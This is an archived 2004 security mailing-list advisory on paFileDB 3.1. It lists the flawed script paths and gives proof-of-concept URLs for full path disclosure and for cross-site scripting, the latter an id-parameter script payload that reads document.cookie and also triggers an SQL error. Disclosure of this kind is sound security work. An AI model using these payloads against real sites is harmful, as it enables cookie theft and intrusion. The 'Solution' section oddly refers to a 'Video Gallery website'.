|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Multiple vulnerabilities paFileDB
From: k1LL3r B0y (k1ll3rb0y
hotmail.com)
Date: Tue Apr 27 2004 - 14:41:04 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Advisory: http://bichosoft.webcindario.com/advisory-04.txt
#########################################################################
###################### :.: DarkBicho :.: ################################
# #
# PROGRAM: paFileDB #
# VERSION: 3.1 #
# URL: http://www.phparena.net #
# BUG: Multiple vulnerabilities #
# DATE: 27/04/2004 #
# AUTHOR: DarkBicho #
# WebSite: http://www.darkbicho.tk #
# Email: darkbichoperu.com #
# Team: Security Wari Projects <www.swp-zone.org> #
# #
#########################################################################
#########################################################################
1.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive information.
http://site/includes/admin/login.php?formname=DarkBicho&formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do
and we get standard error messages, revealing the full path to the nuke
engine scripting files:
Fatal error: Call to undefined function: locbar() in
/home/site/includes/admin/login.php
on line 12
http://localhost/includes/category.php
http://localhost/includes/search.php
http://localhost/includes/main.php
http://localhost/includes/viewall.php
http://localhost/includes/download.php
http://localhost/includes/email.php
http://localhost/includes/file.php
http://localhost/includes/rate.php
http://localhost/includes/stats.php
2. Cross-Site Scripting aka XSS:
----------------------------
Cross-Site Scripting in id variable:
http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'(document.cookie);'' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_cat WHERE
cat_id = '''
3.- SOLUTION:
จจจจจจจจ
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the Video Gallery website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"El pisto es y sera peruano"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbichoperu.com
---------------------------------- [ EOF ]
------------------------------------
_________________________________________________________________
MSN Amor: busca tu ฝ naranja http://latam.msn.com/amor/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]